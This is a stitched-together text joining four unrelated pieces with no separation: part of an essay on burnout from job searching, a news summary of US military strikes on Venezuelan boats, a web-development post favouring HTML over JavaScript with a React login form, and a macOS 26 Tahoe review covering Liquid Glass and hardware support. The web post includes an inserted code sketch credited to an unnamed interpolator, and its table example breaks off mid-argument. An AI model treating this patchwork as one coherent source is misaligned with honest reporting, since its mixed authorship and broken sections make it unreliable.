And sometimes this goes great. Almost every company or product we love started more or less like this. The next one might be yours. I like the weird path, and if you take it and it blossoms, I salute you and I bless you.
But we’re here for the ones that are still stuck in this place, this third phase.
You have been thwarted by the Cliffs of Insanity. You have become nauseated by the Wide World of Compromise. But nowhere else on your broad horizon has yet called you forward.
And here’s the deal: here’s how you know you are really at the end of the rope: you are sick of freaking thinking about it. You are sick of trying to find jobs you should have. You are sick of trying to find jobs you could have. You are sick of trying to find jobs you shouldn’t have—jobs that could be fun but would make your grandmother shake her head a little. You are burned out on search. All possible gas tanks are empty. All the creative-hopeful-bright-idea-one-more-try sauce is gone, dried up, kaput.
You are Burned Out On Search (BOOS for the professionals). That’s the problem. That’s the disease. You’re welcome.
Solutions
I don’t know. I can’t solve your problem. If your problem wasn’t genuinely hard you would have solved it already. Some stranger who doesn’t know your situation ain’t gonna solve it. But here are some notes I’ve picked up along similar roads.
You’re not alone.
A lot, a lot of people are in this boat right now, and frankly, in any given year somebody, probably somebody you know, is in this boat. As I write, 40% of unemployed people have been out of work for at least 15 weeks. That’s almost four months. Fully a fourth have been unemployed at least 27 weeks: over six months. Unemployment is not strange or rare. Happens to everybody: good, capable people who did miracles at prior organizations and will do them again, they just can’t do them right now.
It sucks real bad.
Let’s not understate the horror of unemployment in a modern economy. Talk about a Cliff of Insanity: there is an unbelievable drop in wellbeing from the employed to unemployed. I don’t need to spell it all out—the money stuff, the healthcare stuff, the embarrassment, the boredom, the fear. It’s bad.
And yet somehow in the grand scheme of social sympathy and compassion, unemployment doesn’t get a lot of loving. Tell folks you’ve got knee problems, house foundation problems, college debt, divorce, death in the family, hair stylist went rogue this morning and messed up your cowlick, and here comes all kinds of sympathy. Tell them you’re unemployed, what do you get? “Oh yeah I was unemployed one month ten years ago boy that sucked.” Yes, friend, yes it does suck right now six months in, and unlike your little story there I don’t know when or if it will ever stop.
But I do feel you. High five. I feel you.
It won’t turn out as bad as you fear.
How often have you known somebody whose life was really, finally wrecked by unemployment? I mean, they truly never got back on their feet. Maybe previously they had a decent home, but then they became homeless, and now they’re still homeless? I’m not just talking about stories and imagination and movies right now, I’m talking about who do you personally know who’s had it go that badly?
And look, it does happen. I’m not saying that 100% of people spring back from unemployment. But in your experience what percentage of people get back to a decent place? 90%? It’s got to be more than that. 95%? 99%? Most of the time, your friends and family members go through a period of unemployment and then they find a new, good life on the other side. It might be in the obvious place, it might not be. It might be on one of those “weird paths” we talked about, but very often the new path, no matter how weird, becomes stable and sufficient and even joyful.
People—you—are more resilient and resourceful than you think. You are skillful at imagining bad outcomes. You are also skillful at avoiding them. Do yourself a favor, set aside the imagining bad outcomes skill for a year or two and focus for now on the avoiding skill—and the finding skill that runs along with it.
It’s okay to rest.
This is the best lesson I’ve learned from these kinds of seasons. When you’ve searched and you’ve searched without success until you’re sick of searches, usually the lesson is: now it’s time to rest.
There is a time for hard work, very hard work. There’s a time to push yourself, even to push beyond the limits of what you think you can endure. But a time comes when you are at the limit, at least for now. In those times, the word is “rest.”
Rest is much more than mere idleness. When you rest you give your mind the space to explore possibilities it never had time to consider. Often this exploration happens without your knowing it. Suddenly you see a new way to tackle that challenge. Or you realize it was the wrong challenge to begin with, that what you needed was a different quest. Rest refuels the mind. It refills the gas tanks. It untwists wounded joints. It builds up sore muscles.
We’re not talking about watching eight hours of YouTube every day or playing video games till 4 AM. Rest is all about space. It engages purposefully with serious boredom. You’re going to need to get in there and stare at some ceilings—or better yet, from a hammock, at some skies. Give the mind space to think.
Rest should involve time with friends but also plenty of solitude. It ought to involve some deep reading—books, not just the short pieces—especially those that are full of new ideas, not on the usual menu, surprising perspectives that get your thoughts percolating.
Rest needs to be done well. Set your alarm. Make appointments and keep them. Get outside. Use your hands.
When you’re Burned Out On Search, what do you do next? When we ask it that way the answer becomes obvious. You rest. It’s the only antidote to burnout. Give your mind time to rebuild and it will find ways forward that you never expected. Sometimes the best way to search is… not to search.
U.S. Acts as "Judge, Jury & Executioner" in Venezuelan Boat Strikes, Killing at Least 14
Democracy Now!
www.democracynow.org
2025-09-16 13:48:53
On Monday, President Trump announced the U.S. bombed a boat in international waters, killing three people. The attack was the second to target what the Trump administration claims are drug smugglers from Venezuela. A previous strike on another boat killed 11 people. In a third incident, the U.S. Navy raided a fishing boat in Venezuelan waters, detaining nine fishermen for eight hours. This escalating U.S. military action follows a secret directive that Trump signed approving the use of military force in Latin America and an ongoing buildup of U.S. military presence in the Caribbean.
“We have a very clear example of political theater, an attempt at provocation, an ongoing effort at regime change, and the strategy of trying to use the military to interdict drug trafficking, which has failed incredibly in Mexico, Colombia, everywhere else the U.S. has applied it,” says Venezuelan historian Miguel Tinker Salas, who adds the Trump administration is “misleading the public in indicating that these were drug traffickers with no evidence whatsoever.” He says its attempt to manufacture a crisis in Venezuela is reminiscent of the lead-up to the U.S. war on Iraq.
I’ve worked on so many projects recently that were more complicated than they needed to be because they used JavaScript to generate HTML.
JavaScript is…
Slower to load
Slower to run
More prone to breaking
Harder to read and reason about
Doesn’t actually look like the final output
It’s inferior to just using HTML in nearly every way.
I’m not saying never use JavaScript, though. I think JS is great at augmenting and enhancing what’s already there, and adding interactivity that cannot (yet) be handled with HTML.
Let’s look at two examples…
Submitting a form
I see this a lot in React and JSX.
Every input in a form has an input listener on it. Any changes to that input update a state property. That property is used to set the value of the input, creating this weird circular logic. (This approach is called “controlled inputs” in React-land, and some devs are slowly moving away from it, finally.)
The form submit is often also tied to clicking a <button> rather than submitting a form, meaning that hitting enter on an input won't submit the form. This removes a native accessibility feature.
import { useState } from 'react';

function Login() {
	const [username, setUsername] = useState('');
	const [password, setPassword] = useState('');

	function handleSubmit() {
		if (!username || !password) {
			// Show error message
			return;
		}
		fetch('/login', {
			method: 'POST',
			body: JSON.stringify({ username, password }),
		});
	}

	return (
		<form onSubmit={event => event.preventDefault()}>
			<label htmlFor="username">Username</label>
			<input id="username" type="text" onInput={event => setUsername(event.target.value)} value={username} />

			<label htmlFor="password">Password</label>
			<input id="password" type="password" onInput={event => setPassword(event.target.value)} value={password} />

			<button onClick={handleSubmit}>Submit</button>
		</form>
	);
}
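For contrast, here's a minimal sketch of the same form with HTML doing the heavy lifting (my illustration, not code from the original post; the /login endpoint is carried over from the example above, and the selector is illustrative):

<form action="/login" method="POST">
	<label for="username">Username</label>
	<input id="username" name="username" type="text" required>

	<label for="password">Password</label>
	<input id="password" name="password" type="password" required>

	<button>Submit</button>
</form>

<script>
	// Optional progressive enhancement: hook the form's native submit
	// event, so hitting enter in any field still submits.
	document.querySelector('form').addEventListener('submit', function (event) {
		event.preventDefault();
		fetch(event.target.action, {
			method: event.target.method,
			body: new FormData(event.target),
		});
	});
</script>

The required attributes cover the empty-field check, enter-to-submit works out of the box, and if the script never loads, the browser still posts the form to /login on its own.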
But if a server has to do the work of getting that information and sending it back to you anyways, it could also just send the <table> HTML, which you could then render into the UI.
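As a rough sketch of what that looks like (my example; the /table endpoint and #app element are hypothetical):

// Ask the server for ready-to-render HTML instead of raw JSON
fetch('/table')
	.then(function (response) {
		return response.text();
	})
	.then(function (html) {
		// Drop the server-rendered <table> straight into the UI
		document.querySelector('#app').innerHTML = html;
	});

No client-side templating, no state to keep in sync: the markup you render is the markup you got.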
Liquid Glass brings translucent sheen to the typical batch of iterative changes.
The last time Apple gave macOS a fresh design was in 2020's macOS 11 Big Sur.
That release was relatively light on new features and heavy on symbolism. Big Sur is also when Apple finally jettisoned the "10" in Mac OS X after two decades. More importantly, it was the first release installed on then-new Apple Silicon Macs, the culmination of a decade-plus of in-house chip design that began with single-core, low-power iPhone and iPad chips and culminated in something powerful enough for the Mac Pro.
Today's macOS 26 Tahoe release holds up a translucent, glassy mirror to the Big Sur update. It comes with an all-new look, one that further unifies Apple's design language across all its operating systems. And it even throws out the old version numbering system and introduces a new one.
But if Big Sur was the beginning of an era, Tahoe is the end of one. This will be the final release to support any Intel Macs at all—and it runs on just a bare handful of them, ending support for all Intel MacBook Airs and most other Intel Macs besides. Starting with next year's release, Apple will be able to start jettisoning all Intel code from macOS, including (eventually) the Rosetta translation technology that allows Apple Silicon Macs to run Intel code at all.
As we do every year, we'll look at, and underneath, the shiny surface of the new release. If you have an older Intel Mac that isn't supported, is there anything here that might make you want to upgrade? Is Liquid Glass disruptive or revelatory or just another layer of cosmetic polish on top of the Mac's familiar time-tested Macintosh interface? Let's dive in.
System requirements and compatibility
Tahoe drops many 2018, 2019, and even 2020-vintage Intel Macs that could run last year's Sequoia, plus the late 2017 iMac Pro.
Here are the supported systems:
All Apple Silicon MacBook Airs, MacBook Pros, iMacs, Mac minis, Mac Studios, and Mac Pros with an M1, M2, M3, or M4-series chip.
2019 16-inch MacBook Pro
2020 13-inch MacBook Pro with four Thunderbolt 3 ports (but not the version with two Thunderbolt ports)
2020 iMac
2019 Mac Pro
That support list is rough news for owners of a couple of early-2020 laptops or anybody who bought 2018's Mac mini toward the end of its life (Apple sold some configurations all the way through January 2023).
It's especially difficult this year to divine why Apple is dumping some Intel Macs and keeping others around; in general, Apple drops Macs that rely on older Intel-integrated GPUs like the UHD Graphics 630 or Iris Plus Graphics 615 or 645; the 16-inch MacBook Pro uses one, but it's at least backed up by a dedicated AMD Radeon chip. The 10th-generation Intel chip in the 13-inch MacBook Pro makes the cut, but the marginally slower iteration of the same hardware in the 2020 Intel MacBook Air does not.
The early 2020 Intel MacBook Air is barely 5 years old, and its updates have already dried up. (Credit: Apple)
But whatever side of the line your Intel Mac falls on, at least we all have closure now—a publicly announced, predictable timeline for the end of Intel support. Macs running 2023's macOS 14 Sonoma get one more year of Safari and security updates; 2024's macOS 15 Sequoia gets two more years; and Tahoe's security updates will dry up in mid to late 2028. The full version of Rosetta 2, the Intel-to-Arm app translation layer that keeps most Intel apps running on Apple Silicon Macs, will go away in macOS 28 in late 2027, though Apple says some traces of it will remain after that to support older games.
Next year's macOS release will be the first to require Apple Silicon—but at that point, we'll hopefully get at least a handful of years where no Macs get dropped from the support list, something that hasn't happened since 2017 (!).
Other system requirements
Though the Apple Silicon-only era won't officially start until next year, there's a long list of new and old features that already only function on Apple Silicon Macs.
Anything that touches Apple Intelligence at all—from summarizing notifications to Image Playgrounds—wants an M1 chip or better. The nice thing is that these features will run on any Apple Silicon Mac, from an M1 with 8GB of RAM up through an M4 Max or M3 Ultra. But the list of things Intel Macs can't do is getting pretty long:
Metal 4 and features that require it, including frame generation.
Features under the Apple Intelligence umbrella:
Genmoji
Image Playgrounds
Notification summaries
Writing tools
Live translation in the Phone, FaceTime, and Messages apps
Other features, including those from older macOS versions, that require Apple Silicon:
Running iOS/iPadOS apps
Spatial Audio in FaceTime when using AirPods
The 3D globe and more detailed renderings of cities in Apple Maps
On-device voice dictation, with no Internet connection required and no time limit
Portrait Mode in FaceTime
Live Captions transcriptions in FaceTime or any other app
"Reference mode," which lets you use a 12.9-inch M1 or M2 iPad Pro or any M4 iPad Pro "as a secondary reference display" in Sidecar mode
Inserting emoji using voice dictation
Game mode, which limits background tasks and reduces Bluetooth latency when enabled
High-performance mode in the Screen Sharing app
Getting rid of the "Hey" in "Hey Siri"
Running games built with the Game Porting Toolkit
What isn’t ready for launch yet?
It has become common practice for Apple to announce features at WWDC that it doesn't plan to ship in the x.0 release of the software; those features usually hit somewhere in the x.1 to x.4 updates, at which point the current OS shifts into a lower-key, mostly maintenance mode as Apple's development efforts shift toward next year's version.
The big missing piece for Tahoe and Apple's other fall releases is the new "more personal Siri," a version of the voice assistant that Apple plans to make more capable by backing it up with a large language model that can work with content on your device or in your iCloud account. This feature was somewhat infamously promised as part of last year's release but got bumped back after development difficulties. Apple executives claim that underlying improvements to Apple Intelligence in macOS 26 and the other operating systems will make it possible to ship the new Siri this year.
Otherwise, it doesn't look like there's much in the "later this fall/coming next year" category for this year's releases. If Apple has decided to keep its focus on the ecosystem-wide aesthetic redesign and a long-awaited high-stakes Siri update for this particular update cycle, I can hardly blame them.
Options (or lack thereof) for owners of unsupported Macs
Usually, we talk about what options Intel Mac owners have if their hardware is still in decent shape and they'd like to continue using it with different software, but we're getting to the point where Intel Mac owners are just running out of options.
In past years, Windows 10 has been a workable alternative to tossing functional hardware, and it's the only other operating system that Apple officially supported on the hardware, thanks to Apple's Boot Camp software and drivers. But Windows 10's security updates dry up in October of this year (or October 2026, if you jump through the hoops to sign up for a year of extra patches), which actually makes Windows 10 worse on many Intel Macs than just staying on macOS.
But installing Microsoft's big yearly update patches is a pain, and it's one you'll have to endure if you want to keep getting those security updates. You'll deal with any instability caused by using Apple's aging Windows 10 drivers on a new OS, and the possibility that Microsoft could decide to change Windows' underlying hardware requirements in a way that makes it impossible to install. (This has already happened once—2024's big update quietly made it impossible to run Windows 11 on some late-'00s-into-early-2010s hardware that had been able to use the first few versions.)
You could find some refuge in one of the many flavors of Linux (Ubuntu, Fedora, ChromeOS Flex, and innumerable others), but you'll run into problems on newer Macs with Apple T2 chips. The T2 is used by macOS to handle all kinds of things that are handled by other chips in PCs—video encoding and decoding, disk encryption, storing TouchID fingerprints, enabling the webcam and trackpad, and as an SSD controller, to name a few.
For Linux distributions to be able to do all of these things with the T2, Apple would need to either open up access to it, or someone in the Linux community would need to reverse-engineer support for it. Neither of those things has happened. And given the age and relative obscurity of the T2 hardware, it doesn't seem enormously likely at this point.
Your best option may be the OpenCore Legacy Patcher (OCLP) project, which uses a lot of community-driven "Hackintosh" tools to do for old Intel Macs what they do for generic Intel and AMD hardware: get the latest macOS running on hardware Apple doesn't support.
Each year, that task gets harder, as Apple strips more of the underlying Intel support files out of new macOS versions. A lot of what OCLP does is patch in files from older macOS versions to restore that missing hardware support, and the more stuff that goes missing, the higher the degree of difficulty. On this year's list of "challenges": Fusion Drive support, legacy graphics drivers, FileVault disk encryption support, drivers for older Wi-Fi, Bluetooth, and USB hardware, and support for both the Apple T1 and Apple T2 chips.
For the Apple T2, the challenge for OCLP is similar to the challenges for Linux: a lot of hardware features require it to work, and Apple hasn't documented it or opened it up so that anyone else can use it. The 2018 MacBook Air, the first T2-equipped model to be dropped, still doesn't work with last year's macOS Sequoia. The additional T2 models that Tahoe dumps will be similarly difficult to support.
The OCLP team claims to have made "some progress" on T2 support, but these Macs still won't boot Tahoe, and it may or may not ever become possible.
Many Intel Macs still have between one and three years of security update support left; for unsupported Macs, your best bet is probably to keep using your older but officially supported macOS version for as long as it's patched. You'll miss out on newer iCloud and iMessage features, but things will mostly continue to function as they currently do, and it can buy you time to put together money for a new machine (while buying the OCLP project time to try to add support for your Mac, if it's not already supported). Just know that you're getting to the point where staying up to date and patched is going to require newer hardware.
Branding: What’s in a number?
The first thing to note about the branding of macOS 26 is the number itself. The jump from 15 to 26 isn't as jarring as five years ago, when we finally lost the "10" that had given Mac OS X part of its name for so many years. But it's still potentially confusing in the short term, even if in the long term I do think it makes more sense for an ecosystem as tightly integrated as Apple's to unify around consistent version numbers up and down the entire product stack.
As with new cars, the "26" here is year-based but forward-looking—it's numbered for the year where it will spend nine or so months as the actively developed, currently supported version of the operating system, and not for the year of its release.
On the technical side, just like with the jump from version 10.15 to 11.0, macOS 26 can identify itself as macOS 16 to apps and scripts that might otherwise be broken by the jump. As detailed by the Eclectic Light Company's Howard Oakley, apps developed targeting macOS versions 15 or below will see "16," while apps developed targeting macOS 26 or newer will see "26." Different kinds of scripts have slightly different compatibility behaviors.
What’s in a name?
Tahoe is Apple's 13th California-themed macOS codename, and while the company has stuck a couple of pins in the southern part of the state, the majority of the releases stick within a couple of hundred miles of Apple's Bay Area stomping grounds. Tahoe is one of those.
I am not a California native, but I usually take a little time to read about whatever landmark Apple has named its newest release after. I don't actually think that the codenames signal anything in particular about Apple's goals or intents for a given release, but it is usually fun to work backwards from the name to an explanation.
Nestled in the Sierra Nevada mountain range, Lake Tahoe narrowly misses out on a range of superlatives, in terms of US-based freshwater lakes: It's smaller in volume than the Great Lakes, and it isn't as deep as Oregon's Crater Lake. But it's large and deep enough to have inspired tales of its own Loch Ness Monster-style cryptid ("Tahoe Tessie"), among multiple other urban legends about the frozen bodies of mafia victims or volcanic tunnels that connect it to other lakes.
Tahoe is also one of a few macOS releases (including Sierra and Mojave) where the California landmark in question is shared with the neighboring state of Nevada. Partly because it's a body of water and partly because the distinctive angle in California's eastern border actually starts in Lake Tahoe, the exact location of the border has apparently been the matter of some dispute going as far back as the founding of California.
Both Nevada and California defined their state boundaries in terms of geographical coordinates, and there's apparently some variance as to where those coordinates are depending on the precise shape you use to model the surface of the Earth—one boundary marker on the US National Register of Historic Places notes that six different geographical surveys of California's border were conducted between 1855 and 1900, and none of them agreed on where the border was. The dispute was at its liveliest when the states and the people in them were trying to lay claim to mineral deposits on the border, but it wasn't formally settled until it went up to the Supreme Court in 1980.
So by choosing Tahoe as the name for this year's macOS release, Apple doubtlessly (probably) thought that the clear waters of Lake Tahoe would be a good match for the added motion and translucency of Liquid Glass. The company probably didn't mean to draw attention to the fact that Liquid Glass occasionally renders the boundaries between different parts of a window indistinct, fomenting border disputes. But it ended up being weirdly appropriate anyway. It's fun to learn things!
Installer and installation
A near-decade's worth of macOS installer icons—and finally, one is different! (Credit: Andrew Cunningham)
This year's installer icon is one of the ones that finally justifies years' worth of effort spent tracking and talking about the changes in macOS installer icons. Apple's system-wide quest to replace all app icons with rounded squares has extended to the macOS install icon, which has shed its "circle with an arrow pointing down at it" appearance for the first time in modern macOS' 25-year history. It used to be a circle pointing to a CD or DVD; after that it was just a circle because it was a circle. No longer!
The new icon still uses the "abstract" version of the Tahoe default wallpaper—a wavy, predominantly blue bunch of colorful swirls with a faintly glassy texture that recalls the look of Liquid Glass and the motion of water. This image is made into a rounded square, with a Liquid Glass-style downward-pointing arrow hovering on top of it (there's still a circular icon buried in the installer app, without the arrow—you could use it to make a version of the old icon if you're feeling nostalgic.)
The default Tahoe desktop wallpaper is a photorealistic image, a Dynamic Wallpaper (meaning it's both wallpaper and screensaver, with seamless switches between the two) of Lake Tahoe in Day, Morning, Evening, and Night varieties that can change according to the time of day, whether your Mac is in Light or Dark Mode, or user preference (my favorite is Evening).
The installer itself is roughly 16.9GB in size. If you're creating USB install media for use on multiple Macs, you'll definitely need a 32GB or larger stick, rather than 16GB.
The install process itself isn't dramatically different from the last few macOS releases, except that it will be your first exposure to the left-justified text that's now used throughout system dialogs. That text has been center-aligned for so long that it's still disorienting to me even after months of using Tahoe daily, like viewing a website on a bad Internet connection where the CSS doesn't load. The part of my brain that insists on building perfectly symmetrical buildings in Minecraft doesn't like the asymmetrical whitespace that left-aligned text creates.
If you're upgrading to Tahoe from an older macOS version, you'll be shown a brief reel of demo videos highlighting some of the release's most user-noticeable features: the Liquid Glass UI, the new color customization options, some of the changes to Spotlight search, and the presence of the Phone app. Apple's other updates this year come with similar new-feature sizzle reels. You won't see these videos if you're setting up a brand-new Mac, or one where you've totally reinstalled macOS from scratch.
Free space: Hope you have gigabytes to spare
The amount of free space needed for a baseline macOS install generally climbs from year to year, with some exceptions for years when a particularly large tranche of Intel-specific code gets stripped out (next year, maybe?).
These numbers will vary slightly for different Macs. We have numbers for a base macOS 15.6.1 install and a base macOS 26.0 GM install inside a virtual machine made using Apple's built-in VM framework on an M1 MacBook Air, and we have the same numbers from bare-metal installations on a 15-inch M4 MacBook Air. For the M4 Air, we looked at the numbers with and without Apple Intelligence enabled, since turning those features on requires a multi-gigabyte download of the various models Apple is using to make its AI features work.
Configuration | System | Preboot | Data | Recovery | All volumes
macOS Sequoia 15.6.1, virtual machine | 11.3GB | 6.1GB | 3.2GB | 1.0GB | 21.6GB
macOS Tahoe 26.0 RC, virtual machine | 12.0GB | 6.7GB | 7.5GB | 1.2GB | 27.4GB
macOS Sequoia 15.6.1, M4 MacBook Air | 11.3GB | 7.1GB | 4.9GB | 1.1GB | 24.4GB
macOS Tahoe 26.0 RC, M4 MacBook Air | 12.0GB | 7.7GB | 10.7GB | 1.2GB | 31.6GB
Sequoia, M4, Apple Intelligence | 11.3GB | 7.1GB | 11.7GB | 1.1GB | 31.2GB
Tahoe, M4, Apple Intelligence | 12.0GB | 7.7GB | 18.3GB | 1.2GB | 39.2GB
The bad news is that Tahoe needs a lot more storage space than Sequoia—a whole lot. In a virtual machine, a fresh Sequoia install used 21.6GB and a Tahoe install used 27.4GB, a nearly 6GB increase. On the M4 MacBook Air, it's a 7.2GB increase.
The gap widens even further with Apple Intelligence enabled—a round 8GB increase on the M4 Air. A fresh install of Sequoia with Apple Intelligence installed takes around the same amount of disk space as an install of Tahoe without Apple Intelligence. Tahoe with Apple Intelligence enabled needs twice as much space as a fresh Big Sur install did five years ago.
FileVault, on by default
One other tweak to the install process is the default behavior for Apple's FileVault disk encryption. If you sign in to an Apple account as part of setting up macOS, FileVault now turns on automatically, and also automatically uses your Apple Account for recovery in the event something goes wrong.
This is a departure from previous macOS versions, which made FileVault optional and gave you other, non-cloud options for backing up your recovery key (including printing it out or just writing it down).
But if you decline to sign in with an Apple Account during setup, just creating a local account, the macOS installer offers FileVault encryption, generating a recovery key that you can write down and store elsewhere, but it's possible to skip FileVault entirely. Automating disk encryption and using an online account to sign in mirrors how Microsoft handles disk encryption in modern versions of Windows. But Microsoft tries to require you to use a Microsoft Account and steadily makes that restriction harder and harder to get around. Apple, at least, still has a big "no thanks" button as part of the setup flow.
Liquid Glass
The macOS 26 Tahoe release and its new Liquid Glass user interface theme. (Credit: Andrew Cunningham)
"Liquid Glass" is Apple's branding for the ecosystem-wide reskinning that all of its operating systems are getting this year, its most substantive and comprehensive visual redesign since introducing the "flat" aesthetic of iOS 7 back in 2013.
Liquid Glass isn't a return to the days of "skeuomorphism," when the company's apps tried to mimic the look of real-world materials like brushed metal, paper, and glass in occasionally nonsensical ways. It's more like: If the default background in the iOS 7 era was a totally flat, featureless field of white or black or gray, the default background in the iOS 26 era is now a frosted sheet of glass. These glass sheets allow more of whatever is "underneath" them to shine through, and they have more visible edges that mimic the way that glass catches and reflects light.
The audio slider turns glassy when being dragged. (Credit: Andrew Cunningham)
That's the "glass" part. The "liquid" part is a greater sense of motion and bounciness throughout the operating systems when pulling up notifications or summoning the Control Center or interacting with sliders or checkboxes. I do not find myself with lots of opinions one way or the other about the "liquid" part; a little playfulness never hurt anyone, and the animations here don't commit the same sin as some of the new animations in iOS 7 did: Waiting for them to happen does not actually increase the amount of time you'll spend waiting for things to happen. Good enough for me!
Bouncy Liquid Glass toggles in the Settings app. (Credit: Andrew Cunningham)
Once you filter out YouTube engagement-bait ("liquid ass! liquid ass!" they gleefully chirp in unison, each one confident that they've been the first to arrive at the World's Most Obvious Joke), the general response to Liquid Glass is "eh, you get used to it."
This is how I've felt myself responding to it—in macOS especially, it mostly just fades into the background, and you can keep using your computer the way you could before. Hardly a ringing endorsement. But when you watch a fairly prominent and storied company like Sonos eat itself alive over a bad app redesign or when you remember the growing pains of iOS 7, it's easier to appreciate a visual overhaul that's different without being disruptive.
With that being said, the increased translucency of all these glassy layers does sometimes create legibility problems—problems that are more frustrating because of Apple's visible efforts to fix or work around them.
Consistently inconsistent
The Photos app uses the glassier style for the top of its window, with both the color and the shape of content under the UI staying pretty visible as it hits the top of the window. (Credit: Andrew Cunningham)
Apple has defined two looks for the top part of a Liquid Glass window. One, as visible in the Photos app, is to let more of the underlying content shine through the top of the window, dimming it and diffusing it less aggressively. The other, visible in some views of the Finder or in the Files app for the iPad, uses what Apple calls a "hard-style" effect, fading and diffusing underlying objects more aggressively right where the window content meets the title bar or category labels. The stuff underneath is still visible, but readability is prioritized above translucency.
Those two approaches also extend to other UI elements. Compare the look of the Notification Center in iOS 26 and macOS 26—the iOS 26 bubbles really do have the appearance of thin sheets of lightly frosted glass, where the macOS bubbles just give you the vaguest impression of what's lying underneath them.
Other macOS menu bar items, when expanded, use a less translucent style that more closely matches what Apple is doing with notifications. Spotlight does, too. In terms of the built-in system-level features, it's really only Control Center that seems to use the clearer, glassier look.
It's worth remembering that even at the height of Flatness Fever in the mid-2010s, the Mac's user interface always retained some depth and texture, even as Apple ratcheted up the contrast, vibrancy, and translucency. In the same way, the Mac's version of Liquid Glass looks slightly toned down compared to the same styling in iOS and iPadOS, with a lot less shininess and translucency (not none, but less).
Individual apps are split a bit more evenly between the less-translucent and more-translucent styles. Safari's address bar and header area are a hint more translucent than in Sequoia but considerably more opaque than the same aggressively light-bending glassy UI in iOS 26.
The Safari address bar in iOS: more glassy, with clearly visible colors and shapes underneath, and more bending of light around the edges. (Credit: Andrew Cunningham)
But apps like Photos and Messages share more underlying code with their iOS and iPadOS equivalents. The header/title bar area in the Photos app is everything that the header/title bar in Safari isn't: aggressively glassy all the way to the edge. Apple diffuses the color and shape of underlying content somewhat and dims it a little so that all of the UI that's up there at the top of the screen stays legible, which usually works but occasionally doesn't.
Ars Technica macOS reviews have commented on and complained about the conflict between translucency and legibility in macOS for literally decades, but Liquid Glass really does kick things up to an entirely new level, and it's easier than it ought to be to take screenshots where things just look bad.
Liquid Glass is at its worst when text or images with lots of fine details slide underneath other text. It's visible in the way the text labels from the Settings app conflict with text in the Search box, or when details in photos make the top parts of the Photos app borderline illegible, or in the way some of the buttons are obliterated when you're using a background for a group chat in the Messages app.
Text in and underneath the Search bar blurring together into a fuzzy mess. (Credit: Andrew Cunningham)
You can tell Apple is aware of the problem because of some of the things it has implemented to try to keep things readable in the face of glassy translucency. Scrolling through the App Store or the Games App or Photos, the buttons at the top of the window subtly change their brightness and opacity. Text in the Messages app tries to cast a faint shadow in an attempt to stay readable when positioned over top of a loud background image. All of these subtle, automatic adjustments are happening by design, and some of them work better than others.
In apps that use the glassier, more translucent style, gray text, or text that has its own translucency effect, is always in danger of getting washed out, as is any text without some kind of backing layer between it and the content underneath (see how texts in the Messages app stay readable even when names and timestamps get washed out).
Tweaks Apple has made to the translucency levels throughout the beta process have improved this across all its platforms, which I'd expect to keep happening post-release. I also think Liquid Glass mostly looks better in motion than it does in screenshots. It's not hard to take still images of individual elements that look bad or weird, but these cherry-picked stills don't necessarily capture what it actually looks like in active daily use.
I'd like to see two things as Liquid Glass evolves: a commitment to creating and maintaining legibility and contrast for any text that could ever sit directly on top of other text or images, and more consistency in the way Apple tries to address translucency problems across apps and the various bits and pieces of the macOS user interface. What I do not particularly want Apple to do is to point to the Reduce Transparency toggle in the Accessibility settings and say "if you don't like it then turn it off." Sure, it's nice to have that as an option, and it does address a lot of the individual gripes I've just highlighted here, but it's more of a workaround than a fix.
“Reduce transparency”: What you can control in the Accessibility settings
On that note, though, let's take a quick look at everything that happens to Liquid Glass when you do hit the Reduce Transparency toggle in the Accessibility settings.
As in older releases, windows in this mode will stop picking up a subtle color tint from whatever your desktop wallpaper is. Tahoe's disappearing menu bar background reappears naturally, with no visible trace of the translucency it used to have.
Menus, Spotlight, the Control Center, notifications, and any other UI element that could appear on top of any other UI element get rid of all translucency and transparency, just showing you text on top of a light or dark background. Sometimes, you'll still see those glassy outlines around the edges of things—the Control Center, Safari tabs, menus, and Spotlight are all places you can still see them. But sometimes those borders will disappear, too, like they do for notifications.
The most noticeable change to the new Liquid Glass-ified version of macOS is that Finder, Photos, Messages, and other apps regain a clearly delineated menu bar area. Text, buttons, and other elements become more consistently legible in this mode, and window content is no longer visible beneath them.
If you're having big problems with Liquid Glass and you don't want to wait for Apple to fix whatever problem you're having, the toggle can make the most bothersome aspects of the redesign go away. But it's a hacksaw, not a scalpel—if you mostly like Liquid Glass but have problems with it in one or two specific apps, it's an all-or-nothing proposition and not something you can turn off selectively.
Part of the Liquid Glass revamp is that the Mac's menu bar is going from translucent to fully transparent. The menu bar area still exists, and by default it still persists across the top of the screen at all times unless you're in Full Screen mode (unlike the iPad's now-you-see-me-now-you-don't menu bar). There's just no background by default, and there's usually no effort made to diffuse or darken anything underneath the menu bar to make it more legible.
I say "usually" because the menu bar does still have some tricks up its sleeve. It will automatically shift from white text to black text based on whether you're using a dark or light-colored background, something that it could already do before. But under certain circumstances—when using some shades of gray as your background or an image that's dark in some areas but light in others—macOS will still draw an extremely subtle drop-shadow underneath the menu bar area to maintain legibility. You may never see this drop shadow, and I only noticed it showing up when I was specifically trying to make it show up. But it's still there as a kind of break-glass-in-case-of-legibility-emergency option.
But for wallpapers where the color or pattern could still possibly cause readability issues, a subtle drop shadow shows up underneath it automatically. (Credit: Andrew Cunningham)
If this doesn't work, and you do want a menu bar background that doesn't require you to turn off transparency and translucency everywhere in the operating system, there's a new Menu Bar item in the Settings with a toggle to re-enable the background. That background usually works just like it used to in older macOS versions, but it's more visible against a lighter-colored background. There's not a "light" background version of it that shows up when you're using a darker wallpaper anymore—Apple seems to be assuming that white text on a dark background provides sufficient contrast for people who want it.
The other big menu bar-wide change in Tahoe is that many menu items get their own little glyphs now to go along with the text. Common system-provided menu items like "open" or "paste" or all the things under the Window menu automatically get new icons, even for apps that haven't been updated with Tahoe in mind. These are all pulled from Apple's SF Symbols library, which developers can also draw on for their own custom menu bar icons.
An expansive Control Center
Customizing the Control Center and customizing the menu bar is done through the same interface. (Credit: Andrew Cunningham)
I mentioned the new Menu Bar area in the Settings app, but it's not just for determining menu bar translucency. It also serves as a replacement for the old Control Center settings, because there's more overlap between the menu bar and Control Center in Tahoe.
Tahoe offers toggles for the same handful of classic macOS menu bar items, including Spotlight, Siri, the battery meter, Wi-Fi, audio, Bluetooth, Time Machine, Fast User Switching, and a handful of others. But in Tahoe, the Control Center is getting dramatically more customizable—there are no longer fixed mandatory items that must appear in the Control Center, and there are a whole bunch of new controls besides. And each one of those controls can be added to the menu bar as its own standalone, top-level icon.
That means there's no Control Center item too minor or too niche to be added to the menu bar as a shortcut. If you're the kind of person who uses Shazam to identify ambient music half a dozen times a day, you can add it to the menu bar now. (I like a control that offers to automatically tile your windows for you, splitting the screen between your two most recent windows without all the clicking and/or dragging it usually takes.)
